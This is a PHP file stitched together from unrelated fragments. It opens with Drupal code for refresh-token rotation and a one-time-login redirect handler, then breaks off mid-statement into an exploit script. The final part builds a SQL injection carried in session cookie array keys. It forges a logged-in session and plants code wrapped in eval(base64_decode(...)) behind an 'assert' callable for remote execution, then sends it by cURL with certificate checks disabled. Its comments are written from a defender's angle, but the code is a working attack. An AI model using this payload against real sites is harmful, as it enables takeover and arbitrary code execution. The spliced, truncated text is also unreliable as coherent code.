/**
   * Create a refresh token for the current user
   *
   * It will delete all the existing refresh tokens for that same user as well.
   *
   * @param int $uid
   *   The user ID.
   *
   * @return \RestfulTokenAuth
   *   The token entity.
   */
  private function generateRefreshToken($uid) {
    // Rotation step: collect every refresh token already stored for this
    // user so that the one issued below is the only one left.
    $lookup = new \EntityFieldQuery();
    $lookup->entityCondition('entity_type', 'restful_token_auth');
    $lookup->entityCondition('bundle', 'refresh_token');
    $lookup->propertyCondition('uid', $uid);
    $found = $lookup->execute();

    // The query result is keyed by entity type, then by entity ID.
    $stale_ids = empty($found['restful_token_auth'])
      ? array()
      : array_keys($found['restful_token_auth']);
    if ($stale_ids) {
      // Remove the older tokens before the replacement is created.
      entity_delete_multiple('restful_token_auth', $stale_ids);
    }

    // Build and persist the replacement token. The secret value comes from
    // drupal_random_key().
    // NOTE(review): the value is handed to create()/save() as-is; whether it
    // is hashed at rest is not visible from this method - confirm.
    $refresh_token = $this->create(array(
      'uid' => $uid,
      'type' => 'refresh_token',
      'created' => REQUEST_TIME,
      'name' => t('Refresh token for: @uid', array('@uid' => $uid)),
      'token' => drupal_random_key(),
    ));
    $this->save($refresh_token);

    return $refresh_token;
  }
 /**
  * This is called when an interactive authentication attempt succeeds. This
  * is called by authentication listeners inheriting from
  * AbstractAuthenticationListener.
  *
  * @param Request        $request
  * @param TokenInterface $token
  *
  * @return Response never null
  */
 public function onAuthenticationSuccess(Request $request, TokenInterface $token)
 {
     // The credentials are positional; only the second element (the
     // timestamp of the one-time link) is needed here.
     list(, $timestamp) = $token->getCredentials();
     $account = $token->getUser()->getDrupalUser();

     // Audit trail: record which account consumed a one-time login link.
     watchdog(
         'user',
         'User %name used one-time login link at time %timestamp.',
         array('%name' => $account->name, '%timestamp' => $timestamp)
     );
     drupal_set_message(t('You have just used your one-time login link. It is no longer necessary to use this link to log in. Please change your password.'));

     // A fresh random value is stored in the session and echoed in the
     // redirect URL; the edit form can then accept a password change
     // without asking for the current password.
     // NOTE(review): no session ID regeneration is visible in this method;
     // confirm the surrounding authentication layer rotates the session
     // before this value is written into $_SESSION.
     $passResetToken = drupal_random_key();
     $_SESSION['pass_reset_' . $account->uid] = $passResetToken;

     $query = http_build_query(array('pass-reset-token' => $passResetToken), '', '&');

     return new RedirectResponse(sprintf('/user/%s/edit?%s', $account->uid, $query));
 }
        $code_inject = str_replace('<' . '?', '', str_replace('<' . '?php', '', str_replace('?' . '>', '', file_get_contents($code))));
    } else {
        $code_inject = $code;
    }
}
// Fragment of a script that sends one crafted HTTP request to a Drupal site.
// $url, $code_inject, $user_id and $user_name are assigned before this view.
// The notes below describe what each step visibly does and where a defender
// can observe it.

// Normalise the supplied code and make it end the session and the request.
$code_inject = rtrim($code_inject, ';');
$code_inject .= ';session_destroy();die("");';
// Drop a leading "www." from the target URL.
if (strpos($url, 'www.') === 0) {
    $url = substr($url, 4);
}
// Hand-built session array. Element 'a' holds the supplied code wrapped in
// eval(base64_decode(...)); the other keys use form-handling names
// ('build_info', 'wrapper_callback') and the callable name 'assert'.
// Defender's view: a stored session row that combines "batch_form_state"
// with these keys is an indicator of compromise.
$_SESSION = array('a' => 'eval(base64_decode("' . base64_encode($code_inject) . '"))', 'build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
// args[0] is bound by reference to the 'string' element, so serialize()
// below emits a reference rather than a second copy of the value.
$_SESSION['build_info']['args'][0] =& $_SESSION['string'];
// Everything after "://" in the URL is used as the session name.
list(, $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
// Cookie name: 'SESS' plus the first 32 hex characters of the SHA-256 of the
// session name (presumably the site's own naming scheme - confirm).
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
// Hash of the fixed password 'test', embedded in the row built below.
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
// Serialise the session array behind a "batch_form_state|" prefix and swap
// the braces for text placeholders.
$serial = str_replace('}', 'CURLYCLOSE', str_replace('{', 'CURLYOPEN', "batch_form_state|" . serialize($_SESSION)));
// SQL fragment: a UNION SELECT whose last column restores the braces with
// REPLACE()/CHAR(). The column list presumably mirrors the server's session
// lookup query; that query is not visible here.
$inject = "UNION SELECT {$user_id},'{$user_name}','{$password}','','','',null,0,0,0,1,null,'',0,'',null,{$user_id},'{$session_id}','','127.0.0.1',0,0,REPLACE(REPLACE('" . $serial . "','CURLYCLOSE',CHAR(" . ord('}') . ")),'CURLYOPEN',CHAR(" . ord('{') . ")) -- ";
// The session cookie is sent in array form, with the URL-encoded SQL fragment
// as one of its keys. Detection point: a SESS-prefixed cookie name followed
// by a bracketed key containing SQL text in request logs or WAF rules.
// Mitigation presumably lies in the server never placing cookie array keys
// into SQL unparameterised - confirm against the affected code path.
$cookie = $cookieName . '[test+' . urlencode($inject) . ']=' . $session_id . '; ' . $cookieName . '[test]=' . $session_id . '; S' . $cookieName . '=' . $sec_ssid;
// One request via cURL, with response headers included in the output.
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, True);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, True);
// TLS peer verification is switched off: the server certificate is not validated.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, False);
// A fixed desktop-browser User-Agent and Accept headers are sent, so
// detection should key on the cookie shape rather than the client string.
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5'));
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
// Send the request and print the raw response (headers and body).
$output = curl_exec($ch);
curl_close($ch);
echo $output;